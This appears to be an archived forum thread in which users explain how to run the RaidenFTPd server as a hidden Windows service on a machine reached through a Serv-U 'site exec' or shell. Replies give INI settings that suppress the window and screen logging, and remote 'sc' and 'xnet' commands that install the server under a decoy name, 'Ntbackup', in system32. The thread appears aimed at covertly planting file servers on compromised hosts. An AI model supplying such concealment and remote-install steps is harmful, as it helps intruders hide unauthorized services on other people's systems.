Starlight
i have configure all my files for raidenftpd, but i don't know how to set raidenftpd on service whive an orther way that the program of raidenftpdservice.exe

i would know how can i put raidenftpd as service and how can i start it as hide mode...
i have access to a servu whive site exec for simplify the thing smile.gif
can somebody help me please ?
thx
EXPLOiTED
Well setup a kit and test it all on your pc many times...
Loxy
I use services.exe and srvany.exe to install raiden as a service, and of course set raiden to run hidden. I setup everything locally how I want it first, then upload the files and load them up. and Bam! ; )
Starlight
but what is the line for start raiden as hide ?
B3T4
/hide ? - dunno, just keep on testing, keep on testing

maybe its written in the registry, u could do a search there...
Loxy
Default is "net start RaidenFTPd" : P
guufa
First for Hiding yout raiden put this lines in your ini:
CODE
[SYSTEM]
START_MINIMIZE=2
LOG_SCREEN=0
OPACITY=1


For installing it remotely you can use tools as sc.exe or xnet.exe

CODE
sc \\128.128.128.128 create Ntbackup binpath= C:\winnt\system32\Raiden.exe type= own start= auto error= normal tag= no displayname= "Raiden"
sc \\128.128.128.128 start Raiden


and with xnet.exe if you have a shell or site exec

CODE

XNET INSTALL Raiden /b:c:\WINNT\system32\raiden.exe /n:Raiden /s:auto
XNET  START Raiden


The tools:
Sc
Xnet
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.